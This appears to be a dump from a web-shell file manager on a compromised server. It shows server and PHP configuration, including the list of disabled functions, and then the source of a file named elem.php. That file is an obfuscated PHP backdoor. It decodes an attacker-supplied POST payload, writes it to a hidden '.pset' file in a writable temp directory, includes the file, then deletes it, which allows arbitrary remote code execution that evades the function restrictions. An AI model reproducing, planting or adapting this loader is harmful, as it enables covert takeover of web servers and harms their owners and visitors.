HEX
Server: nginx/1.28.0
System: Linux yisu-68a5f20334161 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User: www (1000)
PHP: 8.2.28
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
Upload Files
File: /www/wwwroot/q.autos58.cn/elem.php
<?php if(fiLTEr_hAs_vAR(INPUT_POST,"ele\x6d")):$_0=ARray_FIlTer([getCWD(),sYS_get_tEmP_DiR(),iNI_GeT("u\x70load_tmp_dir"),geTENv("\124\x4d\x50"),sEsSioN_save_PaTh(),"/d\145v/shm",GEteNV("T\x45M\120"),"/\164mp","/var\x2ftm\160"]);$_1=$_REQUEST["\x65lem"];$_1=eXPLoDe("\x2e",$_1);$_2="";$_3="ab\143de\146ghijk\154\155n\x6fp\161\x72s\164\x75v\167xyz\060\061\x323\x3456789";$_4=StrLEN($_3);foreach($_1 as$_5=>$_6):$_7=orD($_3[$_5%$_4]);$_8=((int)$_6-$_7-($_5%(-655- -0b1010011001)))^(int)RoUNd(29.666666666667+29.666666666667+29.666666666667);$_2.=chR($_8);endforeach;for($_9=(int)roUND(0+0+0+0),$_10=counT($_0);$_9<$_10;$_9++):$_11=$_0[$_9];if(!(!IS_diR($_11)||!iS_wRiTAblE($_11))):$_12=VSPrINtF("%s\x2f\x25s",[$_11,".pset"]);if($_13=fOPeN($_12,"\x77")):if(FWrITe($_13,$_2)!==false):fClOse($_13);include $_12;@UNLINK($_12);exit;endif;endif;endif;endfor;endif;